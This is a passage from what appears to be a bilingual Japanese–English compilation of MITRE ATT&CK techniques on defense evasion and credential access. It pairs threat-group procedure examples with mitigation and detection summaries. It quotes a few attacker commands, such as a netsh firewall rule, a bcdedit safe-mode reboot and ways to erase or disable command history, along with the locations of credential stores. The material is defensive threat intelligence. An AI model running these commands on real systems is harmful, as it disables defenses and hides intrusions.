6443, 8443, and 9443. Kimsuky has been observed disabling the system firewall. Rocke used scripts which killed processes and added firewall rules to block traffic related to other cryptominers. TeamTNT has disabled <code>iptables</code>. Prior to executing a backdoor ToddyCat has run `cmd /c start /b netsh advfirewall firewall add rule name="SGAccessInboundRule" dir=in protocol=udp action=allow localport=49683` to allow the targeted system to receive UDP packets on port 49683. BlackByte modified firewall rules on victim machines to enable remote system discovery. Salt Typhoon has made changes to the Access Control List (ACL) and loopback interface address on compromised devices. Velvet Ant modified system firewall settings during PlugX installation using `netsh.exe` to open a listening, random high number port on victim devices. UNC3886 has used the TABLEFLIP traffic redirection utility and the esxcli command line to modify firewall rules. Medusa Group has utilized PsExec to execute batch scripts that modify firewall settings. Medusa Group has also enabled and modified firewall rules to allow for RDP connections for lateral movement and device interactions. PlugX has modified local firewall rules on victim machines to enable a random, high-number listening port for subsequent access and C2 activity. The "ZR" variant of BACKSPACE will check to see if known host-based firewalls are installed on the infected systems. BACKSPACE will attempt to establish a C2 channel, then will examine open windows to identify a pop-up from the firewall software and will simulate a mouse-click to allow the connection to proceed. Kasidet has the ability to change firewall settings to allow a plug-in to be downloaded. netsh can be used to disable local firewall settings. InvisiMole has a command to disable routing and the Firewall on the victim’s machine. NanoCore can modify the victim's firewall. HOPLIGHT has modified the firewall using netsh. ZxShell can disable the firewall by modifying the registry key <code>HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile</code>. CookieMiner has checked for the presence of "Little Snitch", macOS network monitoring and application firewall software, stopping and exiting if it is found. Grandoreiro can block the Deibold Warsaw GAS Tecnologia security tool at the firewall level. PyDCrypt has modified firewall rules to allow incoming SMB, NetBIOS, and RPC connections using `netsh.exe` on remote machines. BPFDoor starts a shell on a high TCP port starting at 42391 up to 43391, then changes the local `iptables` rules to redirect all packets from the attacker to the shell port. ShrinkLocker turns on the system firewall and deletes all of its rules during execution. Hannotog can modify local firewall settings via `netsh` commands to open a listening UDP port. THINCRUST can use the Django python module "django.views.decorators.csrf” along with the decorator “csrf_exempt” within victim firewalls to disable cross-site request forgery protections. 敵対者は、脆弱性を悪用して防御機構を妨害することがある。 Adversaries may exploit vulnerabilities in security software, infrastructure, or defensive components to degrade, disable, or otherwise continue to impair their ability to prevent, detect, or respond to malicious activity. Adversaries may exploit a system or application vulnerability to directly interfere with defensive mechanisms. Exploitation occurs when an adversary takes advantage of a programming error in software, services, or the operating system to execute adversary-controlled code, often with the goal of weakening or disabling protections. 防御妨害のための脆弱性悪用に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 敵対者は、セーフモードで起動することでセキュリティ製品の動作を回避することがある。 Adversaries may abuse Windows safe mode to disable endpoint defenses. Safe mode starts up the Windows operating system with a limited set of drivers and services. Third-party security software such as endpoint detection and response (EDR) tools may not start after booting Windows in safe mode. There are two versions of safe mode: Safe Mode and Safe Mode with Networking. It is possible to start additional services after a safe mode boot. 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 ソフトウェアを安全に構成し、悪用を防ぐ。 セーフモードブートに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 REvil can force a reboot in safe mode with networking. AvosLocker can restart a compromised machine in safe mode. Black Basta can reboot victim machines in safe mode with networking via `bcdedit /set safeboot network`. LockBit 3.0 can reboot the infected host into Safe Mode. RansomHub can reboot targeted systems into Safe Mode prior to encryption. Qilin can reboot targeted systems in safe mode to avoid detection. Embargo has used a DLL variant of MDeployer to disable security solutions through Safe Mode. 敵対者は、システムやプロトコルを脆弱な旧版へダウングレードさせて防御を妨害することがある。 Adversaries may downgrade or use a version of system features that may be outdated, vulnerable, and/or does not support updated security controls. Downgrade attacks typically take advantage of a system’s backward compatibility to force it into less secure modes of operation. 不要な機能やプログラムを無効化・削除し、攻撃対象領域を縮小する。 ソフトウェアを安全に構成し、悪用を防ぐ。 ダウングレード攻撃に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During FrostyGoop Incident, the adversary downgraded firmware on victim devices in order to impair visibility into the process environment. SILENTTRINITY can downgrade NTLM to capture NTLM hashes. BlackByte Ransomware enables SMBv1 during execution. 敵対者は、コマンド履歴のログ記録を抑止して痕跡を残さないようにすることがある。 Adversaries may impair command history logging to hide commands they run on a compromised system. Various command interpreters keep track of the commands users type in their terminal so that users can retrace what they have done. OSを安全に構成し、攻撃対象領域を縮小する。 環境変数の権限を制限し、不正な改変を防ぐ。 コマンド履歴ログの抑止に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 ArcaneDoor included disabling logging on targeted Cisco ASA appliances. During RedPenguin, UNC3886 used malware to clear the `HISTFILE` environmental variable and to inject into Junos OS processes to inhibit logging. APT38 has prepended a space to all of their terminal commands to operate without leaving traces in the HISTCONTROL environment. Sea Turtle unset the Bash and MySQL history files on victim systems. UNC3886 has tampered with and disabled logging services on targeted systems. Medusa Group has removed PowerShell command history through the use of the PSReadLine module by running the PowerShell command `Remove-Item (Get-PSReadlineOption).HistorySavePath`. SILENTTRINITY can bypass ScriptBlock logging to execute unmanaged PowerShell code from memory. BPFDoor sets the `MYSQL_HISTFILE` and `HISTFILE` to `/dev/null` preventing the shell and MySQL from logging history in `/proc/<PID>/environ`. Line Dancer can disable syslog on compromised devices. VIRTUALPITA can impair logging by setting the `HISTFILE` environmental variable to `0` and stopping the `vmsyslogd` service. BRICKSTORM has impaired command logging through the use of `dev/null` which prevents generating output from the command and does not wait for input. SPAWNCHIMERA has disabled logging and log forwarding on Ivanti devices targeting the `dslogserver` process. 敵対者は、OSやソフトウェアから認証情報（ログイン情報やパスワードのハッシュ等）を取得しようとすることがある。取得した認証情報は横展開やリソースアクセスに使われる。 Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password. Credentials can be obtained from OS caches, memory, or structures. Credentials can then be used to perform Lateral Movement and access restricted information. 敵対者は、LSASSプロセスのメモリから認証情報をダンプすることがある。Adversaries may attempt to access credential material stored in the process memory of the Local Security Authority Subsystem Service (LSASS). After a user logs on, the system generates and stores a variety of credential materials in LSASS process memory. These credential materials can be harvested by an administrative user or SYSTEM and used to conduct Lateral Movement using Use Alternate Authentication Material. 敵対者は、SAMデータベースからローカルアカウントの認証情報を取得することがある。Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database either through in-memory techniques or through the Windows Registry where the SAM database is stored. The SAM is a database file that contains local accounts for the host, typically those found with the <code>net user</code> command. Enumerating the SAM database requires SYSTEM level access. 敵対者は、ドメインコントローラのNTDS.ditからドメイン認証情報を取得することがある。Adversaries may attempt to access or create a copy of the Active Directory domain database in order to steal credential information, as well as obtain other information about domain members such as devices, users, and access rights. By default, the NTDS file (NTDS.dit) is located in <code>%SystemRoot%\NTDS\Ntds.dit</code> of a domain controller. 敵対者は、LSAシークレットから保存された認証情報を取得することがある。Adversaries with SYSTEM access to a host may attempt to access Local Security Authority (LSA) secrets, which can contain a variety of different credential materials, such as credentials for service accounts. LSA secrets are stored in the registry at <code>HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets</code>. LSA secrets can also be dumped from memory. 敵対者は、キャッシュされたドメイン認証情報を取得することがある。Adversaries may attempt to access cached domain credentials used to allow authentication to occur in the event a domain controller is unavailable. 敵対者は、DCSyncを用いてドメインコントローラから認証情報を複製・取得することがある。Adversaries may attempt to access credentials and other sensitive information by abusing a Windows Domain Controller's application programming interface (API) to simulate the replication process from a remote domain controller using a technique called DCSync. 敵対者は、Linuxの/procファイルシステムからメモリ内の認証情報を取得することがある。Adversaries may gather credentials from the proc filesystem or `/proc`. The proc filesystem is a pseudo-filesystem used as an interface to kernel data structures for Linux based systems managing virtual memory. For each process, the `/proc/<PID>/maps` file shows how memory is mapped within the process’s virtual address space. And `/proc/<PID>/mem`, exposed for debugging purposes, provides access to the process’s virtual address space. 敵対者は、Linuxの/etc/passwdと/etc/shadowからアカウント情報・パスワードハッシュを取得することがある。Adversaries may attempt to dump the contents of <code>/etc/passwd</code> and <code>/etc/shadow</code> to enable offline password cracking. Most modern Linux operating systems use a combination of <code>/etc/passwd</code> and <code>/etc/shadow</code> to store user account information, including password hashes in <code>/etc/shadow</code>. By default, <code>/etc/shadow</code> is only readable by the root user. Active Directoryを適切に構成し、攻撃対象領域を縮小する。 ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 特権プロセスの完全性を保護し、不正なコード注入を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 OSを安全に構成し、攻撃対象領域を縮小する。 エンドポイントで悪意ある挙動を検出・防止する。 機微情報を暗号化し、窃取時の影響を軽減する。 認証情報の保存領域へのアクセスを保護する。 OS認証情報のダンプに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Axiom has been known to dump credentials. APT28 regularly deploys both publicly available (ex: Mimikatz) and custom password retrieval tools on victims. Poseidon Group conducts credential dumping on victims, with a focus on obtaining credentials belonging to domain and database servers. Suckfly used a signed credential-dumping tool to obtain victim account credentials. APT32 used GetPassword_x64 to harvest credentials. Sowbug has used credential dumping tools. Leviathan has used publicly available tools to dump password hashes, including HOMEFRY. APT39 has used different versions of Mimikatz to obtain credentials. Mustang Panda utilized “Hdump” to dump credentials from memory. Tonto Team has used a variety of credential dumping tools. Ember Bear gathers credential material from target systems, such as SSH keys, to facilitate access to victim environments. BlackByte used tools such as Cobalt Strike and Mimikatz to dump credentials from victim systems. Storm-0501 has used the SecretsDump module within Impacket can perform credential dumping to obtain account and password information. Carbanak obtains Windows logon password details. PinchDuke steals credentials from compromised hosts. PinchDuke's credential stealing functionality is believed to be based on the source code of the Pinch credential stealing malware (also known as LdPinch). Credentials targeted by PinchDuke include ones associated many sources such as WinInet Credential Cache, and Lightweight Directory Access Protocol (LDAP). OnionDuke steals credentials from its victims. Trojan.Karagany can dump passwords and save them into <code>\ProgramData\Mail\MailAg\pwds.txt</code>. HOMEFRY can perform credential dumping. Revenge RAT has a plugin for credential harvesting. MgBot includes modules for dumping and capturing credentials from process memory. 敵対者は、ネットワークインタフェースを盗聴用モードにして通過するトラフィックを取得し、認証情報やその他の機密情報を入手することがある。 Adversaries may passively sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data. アカウントの作成・権限・ライフサイクルを適切に管理する。 ネットワークを分割し、横展開や影響範囲を限定する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 機微情報を暗号化し、窃取時の影響を軽減する。 ネットワークスニッフィングに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the 2015 Ukraine Electric Power Attack, Sandworm Team used BlackEnergy’s network sniffer module to discover user credentials being sent over the network between the local LAN and the power grid’s industrial control systems. ArcaneDoor included network packet capture and sniffing for data collection in victim environments. During RedPenguin, UNC3886 used a passive backdoor to act as a libpcap-based packet sniffer. APT28 deployed the open source tool Responder to conduct NetBIOS Name Service poisoning, which captured usernames and hashed passwords that allowed access to legitimate credentials. APT28 close-access teams have used Wi-Fi pineapples to intercept Wi-Fi signals and user credentials. Sandworm Team has used intercepter-NG to sniff passwords in network traffic. APT33 has used SniffPass to collect credentials by sniffing network traffic. Kimsuky has used the Nirsoft SniffPass network sniffer to obtain passwords sent over non-secure protocols. DarkVishnya used network sniffing to obtain login data. Salt Typhoon has used a variety of tools and techniques to capture packet data between network interfaces. Velvet Ant has used a custom tool, "VELVETTAP", to perform packet capture from compromised F5 BIG-IP devices. UNC3886 has used the LOOKOVER sniffer to sniff TACACS+ authentication packets. Regin appears to have functionality to sniff for credentials passed over HTTP, SMTP, and SMB. Responder captures hashes and credentials that are sent to the system after the name services have been poisoned. Impacket can be used to sniff network traffic via an interface or raw socket. Empire can be used to conduct packet captures on target hosts. Emotet has been observed to hook network APIs to monitor network traffic. PoshC2 contains a module for taking packet captures on compromised hosts. MESSAGETAP uses the libpcap library to listen to all traffic and parses network protocols starting with Ethernet and IP layers. It continues parsing protocol layers including SCTP, SCCP, and TCAP and finally extracts SMS message data and routing metadata. Penquin can sniff network traffic to look for packets matching specific conditions. NBTscan can dump and print whole packet content. FoggyWeb can configure custom listeners to passively monitor all incoming HTTP GET and POST requests sent to the AD FS server from the intranet/internet and intercept HTTP requests that match the custom URI patterns defined by the actor. VersaMem hooked the Catalina application filter chain `doFilter` on compromised systems to monitor all inbound requests to the local Tomcat web server, inspecting them for parameters like passwords and follow-on Java modules. Line Dancer can create and exfiltrate packet captures from compromised environments. J-magic has a pcap listener function that can create an Extended Berkley Packet Filter (eBPF) on designated interfaces and ports. cd00r can use the libpcap library to monitor captured packets for specifc sequences. JumbledPath has the ability to perform packet capture on remote devices via actor-defined jump-hosts. CASTLETAP has the ability to create a raw promiscuous socket to sniff network traffic. SPAWNCHIMERA has monitored and filtered network traffic on compromised edge devices, allowing legitimate traffic to pass while redirecting attacker-controlled traffic to infrastructure under adversary control. 敵対者は、ユーザー入力を取得することで認証情報や情報を得ることがある。キーロギングやAPIフックなどが含まれる。 Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture). 敵対者は、キー入力を記録して認証情報や情報を取得することがある。Adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging is likely to be used to acquire credentials for new access opportunities when OS Credential Dumping efforts are not effective, and may require an adversary to intercept keystrokes on a system for a substantial period of time before credentials can be successfully captured. In order to increase the likelihood of capturing credentials quickly, an adversary may also perform actions such as clearing browser cookies to force users to reauthenticate to systems. 敵対者は、偽の入力プロンプト（GUI）を表示して認証情報を取得することがある。Adversaries may mimic common operating system GUI components to prompt users for credentials with a seemingly legitimate prompt. When programs are executed that need additional privileges than are present in the current user context, it is common for the operating system to prompt the user for proper credentials to authorize the elevated privileges for the task (ex: Bypass User Account Control). 敵対者は、正規Webポータルに細工して入力された認証情報を取得することがある。Adversaries may install code on externally facing portals, such as a VPN login page, to capture and transmit credentials of users who attempt to log into the service. For example, a compromised login page may log provided user credentials before logging the user in to the service. 敵対者は、認証関連APIをフックして入力された認証情報を取得することがある。Adversaries may hook into Windows application programming interface (API) functions and Linux system functions to collect user credentials. Malicious hooking mechanisms may capture API or function calls that include parameters that reveal user authentication credentials. Unlike Keylogging, this technique focuses specifically on API functions that include parameters that reveal user credentials. 入力キャプチャに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Versa Director Zero Day Exploitation intercepted and harvested credentials from user logins to compromised devices. Leviathan captured submitted multfactor authentication codes and other technical artifacts related to remote access sessions during Leviathan Australian Intrusions. APT39 has utilized tools to capture mouse movements. APT42 has used credential harvesting websites. Storm-1811 has used a PowerShell script to capture user credentials after prompting a user to authenticate to run a malicious script masquerading as a legitimate update item. FlawedAmmyy can collect mouse events. Chaes has a module to perform any API hooking it desires. Kobalos has used a compromised SSH client to capture the hostname, port, username and password used to establish an SSH connection from the compromised host. metaMain can log mouse events. Mafalda can conduct mouse event logging. NPPSPY captures user input into the Winlogon process by redirecting RPC traffic from legitimate listening DLLs within the operating system to a newly registered malicious item that allows for recording logon information in cleartext. InvisibleFerret has collected mouse and keyboard events using “pyWinhook”. 敵対者は、認証情報が不明な場合やハッシュを取得した場合に、総当たりでパスワードを推測・解読することがある。 Adversaries may use brute force techniques to gain access to accounts when passwords are unknown or when password hashes are obtained. Without knowledge of the password for an account or set of accounts, an adversary may systematically guess the password using a repetitive or iterative mechanism. Brute forcing passwords can take place via interaction with a service that will check the validity of those credentials or offline against previously acquired credential data, such as password hashes. 敵対者は、一般的なパスワードを推測してアカウントへのアクセスを試みることがある。Adversaries with no prior knowledge of legitimate credentials within the system or environment may guess passwords to attempt access to accounts. Without knowledge of the password for an account, an adversary may opt to systematically guess the password using a repetitive or iterative mechanism. An adversary may guess login credentials without prior knowledge of system or environment passwords during an operation by using a list of common passwords. Password guessing may or may not take into account the target's policies on password complexity or use policies that may lock accounts out after a number of failed attempts. 敵対者は、取得したハッシュをオフラインで解読してパスワードを得ることがある。Adversaries may use password cracking to attempt to recover usable credentials, such as plaintext passwords, when credential material such as password hashes are obtained. OS Credential Dumping can be used to obtain password hashes, this may only get an adversary so far when Pass the Hash is not an option. Further, adversaries may leverage Data from Configuration Repository in order to obtain hashed credentials for network devices. 敵対者は、少数の一般的パスワードを多数のアカウントに試すことでロックアウトを避けつつ侵入を試みることがある。Adversaries may use a single or small list of commonly used passwords against many different accounts to attempt to acquire valid account credentials. Password spraying uses one password (e.g. 'Password01'), or a small list of commonly used passwords, that may match the complexity policy of the domain. Logins are attempted with that password against many different accounts on a network to avoid account lockouts that would normally occur when brute forcing a single account with many passwords. 敵対者は、漏洩した認証情報の組を多数のサービスに試すことがある。Adversaries may use credentials obtained from breach dumps of unrelated accounts to gain access to target accounts through credential overlap. Occasionally, large numbers of username and password pairs are dumped online when a website or service is compromised and the user account credentials accessed. The information may be useful to an adversary attempting to compromise accounts by taking advantage of the tendency for users to use the same passwords across personal and business accounts. アカウントの作成・権限・ライフサイクルを適切に管理する。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 ログイン試行回数やロックアウト等のアカウント使用ポリシーを設定する。 ブルートフォースに関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Dream Job, Lazarus Group performed brute force attacks against administrator accounts. During the 2016 Ukraine Electric Power Attack, Sandworm Team used a script to attempt RPC authentication against a number of hosts. APT28 can perform brute force attacks to obtain credentials. Turla may attempt to connect to systems within a victim's network using <code>net use</code> commands and a predefined list or collection of passwords. Dragonfly has attempted to brute force credentials to gain access. OilRig has used brute force techniques to obtain credentials. FIN5 has has used the tool GET2 Penetrator to look for remote login and hard-coded credentials. APT38 has used brute force techniques to attempt account access when passwords are unknown or when password hashes are unavailable. APT39 has used Ncrack to reveal credentials. APT41 performed password brute-force attacks on the local admin account. DarkVishnya used brute-force attack to obtain login data. Fox Kitten has brute forced RDP credentials. HEXANE has used brute force attacks to compromise valid credentials. Ember Bear used the `su-bruteforce` tool to brute force specific users using the `su` command. Agrius engaged in various brute forcing activities via SMB in victim environments. Storm-0501 has leveraged brute force attacks to obtain credentials. VOID MANTICORE has conducted brute-force attempts against organizational VPN infrastructure. Chaos conducts brute force attacks against SSH services to gain initial access. PoshC2 has modules for brute forcing local administrator and AD user accounts. CrackMapExec can brute force supplied user credentials across a network range. Caterpillar WebShell has a module to perform brute force attacks on a system. Pysa has used brute force attempts against a central management console, as well as some Active Directory accounts. Kinsing has attempted to brute force hosts over SSH. QakBot can conduct brute force attacks to capture credentials. 敵対者は、ユーザーのMFAに使われるトークンや資格情報を傍受することがある。スマートカードやワンタイムトークンが対象となりうる。 Adversaries may target multi-factor authentication (MFA) mechanisms, (i.e., smart cards, token generators, etc.) to gain access to credentials that can be used to access systems, services, and network resources. Use of MFA is recommended and provides a higher level of security than usernames and passwords alone, but organizations should be aware of techniques that could be used to intercept and bypass these security mechanisms. ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 多要素認証の傍受に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During Operation Wocao, threat actors used a custom collection method to intercept two-factor authentication soft tokens. Leviathan abused compromised appliance access to collect multifactor authentication token values during Leviathan Australian Intrusions. Kimsuky has used a proprietary tool to intercept one time passwords required for two-factor authentication. Chimera has registered alternate phone numbers for compromised users to intercept 2FA codes sent via SMS. LAPSUS$ has replayed stolen session token and passwords to trigger simple-approval MFA prompts in hope of the legitimate user will grant necessary approval. APT42 has intercepted SMS-based one-time passwords and has set up two-factor authentication. Additionally, APT42 has used cloned or fake websites to capture MFA tokens. Sykipot is known to contain functionality that enables targeting of smart card technologies to proxy authentication for connections to restricted network resources using detected hardware tokens. SLOWPULSE can log credentials on compromised Pulse Secure VPNs during the `DSAuth::AceAuthServer::checkUsernamePassword`ACE-2FA authentication procedure. evilginx2 can intercept authentication tokens to enable bypass of non-phishing resistant forms of MFA. 敵対者は、認証要求を強制的に発生させ、ユーザーやシステムの認証情報（ハッシュ等）を窃取することがある。 Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept. 強固なパスワードポリシーを適用し、推測・解読を困難にする。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 強制認証に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Dragonfly has gathered hashed user credentials over SMB using spearphishing attachments with external resource links and by modifying .LNK file icon resources to collect credentials from virtualized systems. DarkHydrus used Template Injection to launch an authentication window for users to enter their credentials. EnvyScout can use protocol handlers to coax the operating system to send NTLMv2 authentication responses to attacker-controlled infrastructure. 敵対者は、ソフトウェアの脆弱性を悪用して認証情報を収集することがある。 Adversaries may exploit software vulnerabilities in an attempt to collect credentials. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. 開発者に対し、脆弱性を生まない安全な設計・実装の指針を提供する。 脅威インテリジェンスを活用し、対象となる脅威アクターのTTPを把握する。 アプリを分離・サンドボックス化し、影響範囲を限定する。 エクスプロイト保護機能で脆弱性悪用を防ぐ。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 認証情報アクセスのための脆弱性悪用に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Leviathan exploited vulnerable network appliances during Leviathan Australian Intrusions, leading to the collection and exfiltration of valid credentials. UNC3886 exploited CVE-2022-22948 in VMware vCenter to obtain encrypted credentials from the vCenter postgresDB. 敵対者は、OAuthトークンなどのアプリアクセストークンを窃取し、保護されたリソースへアクセスすることがある。 Adversaries can steal application access tokens as a means of acquiring credentials to access remote systems and resources. ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 アカウントの作成・権限・ライフサイクルを適切に管理する。 危険なWebコンテンツへのアクセスを制限する。 システムやアカウントを監査し、不正な活動を検出する。 アプリケーションアクセストークンの窃取に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Leviathan abused access to compromised appliances to collect JSON Web Tokens (JWTs), used for creating virtual desktop sessions, during Leviathan Australian Intrusions. APT28 has used several malicious applications to steal user OAuth access tokens including applications masquerading as "Google Defender" "Google Email Protection," and "Google Scanner" for Gmail users. They also targeted Yahoo users with applications masquerading as "Delivery Service" and "McAfee Email Protection". APT29 uses stolen tokens to access victim accounts, without needing a password. AADInternals can steal users’ access tokens via phishing emails containing malicious links. Peirates gathers Kubernetes service account tokens using a variety of techniques. Shai-Hulud has stolen access tokens and API tokens from with CI/CD pipeline solutions and repositories. TruffleHog has gathered access tokens and API tokens from CI/CD pipeline solutions and repositories. 敵対者は、認証済みのWebセッションクッキーを窃取し、認証を回避してアプリへアクセスすることがある。 An adversary may steal web application or service session cookies and use them to gain access to web applications or Internet services as an authenticated user without needing credentials. Web applications and services often use session cookies as an authentication token after a user has authenticated to a website. ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 危険なWebコンテンツへのアクセスを制限する。 多要素認証を導入し、認証情報の窃取による不正アクセスを防ぐ。 システムやアカウントを監査し、不正な活動を検出する。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 ソフトウェアを安全に構成し、悪用を防ぐ。 Webセッションクッキーの窃取に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 During the SolarWinds Compromise, APT29 stole Chrome browser cookies by copying the Chrome profile directories of targeted users. Lotus Blossom has used publicly-available tools to steal cookies from browsers such as Chrome. Sandworm Team used information stealer malware to collect browser session cookies. Kimsuky has used malware, such as TRANSLATEXT, to steal and exfiltrate browser cookies. Evilnum can steal cookies and session information from browsers. LuminousMoth has used an unnamed post-exploitation tool to steal cookies from the Chrome browser. Scattered Spider retrieves browser cookies via Raccoon Stealer. Star Blizzard has used EvilGinx to steal the session cookies of victims directed to phishing domains. APT42 has used custom malware to steal login and cookie data from common browsers. TajMahal has the ability to steal web session cookies from Internet Explorer, Netscape Navigator, FireFox and RealNetworks applications. CookieMiner can steal Google Chrome and Apple Safari browser cookies from the victim’s machine. Grandoreiro can steal the victim's cookies to use for duplicating the active session from another device. EVILNUM can harvest cookies and upload them to the C2 server. Chaes has used a script that extracts the web session cookie and sends it to the C2 server. QakBot has the ability to capture web session cookies. BLUELIGHT can harvest cookies from Internet Explorer, Edge, Chrome, and Naver Whale browsers. XCSSET uses <code>scp</code> to access the <code>~/Library/Cookies/Cookies.binarycookies</code> file. DarkGate attempts to steal Opera cookies, if present, after terminating the related process. Spica has the ability to steal cookies from Chrome, Firefox, Opera, and Edge browsers. MgBot includes modules that can steal cookies from Firefox, Chrome, and Edge web browsers. Raccoon Stealer attempts to steal cookies and related information in browser history. TRANSLATEXT has exfiltrated updated cookies from Google, Naver, Kakao or Daum to the C2 server. XLoader can capture web session cookies and session information from victim browsers. Lumma Stealer has harvested cookies from various browsers. RedLine Stealer has stolen browser cookies and settings. evilginx2 can collect information on each session with a victim including the session cookie. GlassWorm has harvested Safari cookies stored within `/Library/Containers/com.apple.Safari/Data/Library/Cookies/ Cookies.binarycookies`. GlassWorm has also stolen cookies within Chromium and Firefox browsers. LODEINFO can list the contents of `%LocalAppData%\Google\Chrome\User Data\` and `%LocalAppData%\Microsoft\Edge\User Data\` to obtain cookies. 敵対者は、ファイル・レジストリ・履歴など保護が不十分な場所に保存された認証情報を探索・取得することがある。 Adversaries may search compromised systems to find and obtain insecurely stored credentials. These credentials can be stored and/or misplaced in many locations on a system, including plaintext files (e.g. Shell History), operating system or application-specific repositories (e.g. Credentials in Registry), or other specialized files/artifacts (e.g. Private Keys). 敵対者は、設定ファイル等に平文保存された認証情報を探索することがある。Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords. 敵対者は、レジストリに保存された認証情報を探索することがある。Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons. 敵対者は、シェルのコマンド履歴から認証情報を取得することがある。Adversaries may search the command history on compromised systems for insecurely stored credentials. 敵対者は、保存された秘密鍵を窃取することがある。Adversaries may search for private key certificate files on compromised systems for insecurely stored credentials. Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, .pfx, .cer, .p7b, .asc. 敵対者は、クラウドのインスタンスメタデータAPIから認証情報を取得することがある。Adversaries may attempt to access the Cloud Instance Metadata API to collect credentials and other sensitive data. 敵対者は、グループポリシー設定（GPP）に埋め込まれた認証情報を取得することがある。Adversaries may attempt to find unsecured credentials in Group Policy Preferences (GPP). GPP are tools that allow administrators to create domain policies with embedded credentials. These policies allow administrators to set local accounts. 敵対者は、コンテナAPIから認証情報を取得することがある。Adversaries may gather credentials via APIs within a containers environment. APIs in these environments, such as the Docker API and Kubernetes APIs, allow a user to remotely manage their container resources and cluster components. 敵対者は、チャットツールのメッセージに含まれる認証情報を取得することがある。Adversaries may directly collect unsecured credentials stored or passed through user communication services. Credentials may be sent and stored in user chat communication applications such as email, chat services like Slack or Teams, collaboration tools like Jira or Trello, and any other services that support user communication. Users may share various forms of credentials (such as usernames and passwords, API keys, or authentication tokens) on private or public corporate internal communications channels. Active Directoryを適切に構成し、攻撃対象領域を縮小する。 ユーザーにソーシャルエンジニアリングや不審な操作への注意を教育する。 ファイルやディレクトリの権限を最小化し、不正な改変を防ぐ。 特権アカウントの利用を最小化・監視し、悪用を防ぐ。 強固なパスワードポリシーを適用し、推測・解読を困難にする。 OSを安全に構成し、攻撃対象領域を縮小する。 ネットワーク越しのリソースアクセスを制限する。 ネットワークトラフィックをフィルタリングし、悪意ある通信を遮断する。 機微情報を暗号化し、窃取時の影響を軽減する。 システムやアカウントを監査し、不正な活動を検出する。 ソフトウェアを最新に保ち、既知の脆弱性を修正する。 保護されていない認証情報に関連する不審な挙動を、ログ・プロセス・ネットワーク等の監視データから検出する。関連するイベントやコマンド実行、異常なアクセスパターンを相関分析することで検知を試みる。 Leviathan gathered credentials hardcoded in binaries located on victim devices during Leviathan Australian Intrusions. Volt Typhoon has obtained credentials insecurely stored on targeted network appliances. Astaroth uses an external software known as NetPass to recover passwords. Pacu can search for sensitive data: for example, in Code Build environment variables, EC2 user data, and Cloud Formation templates. DarkGate uses 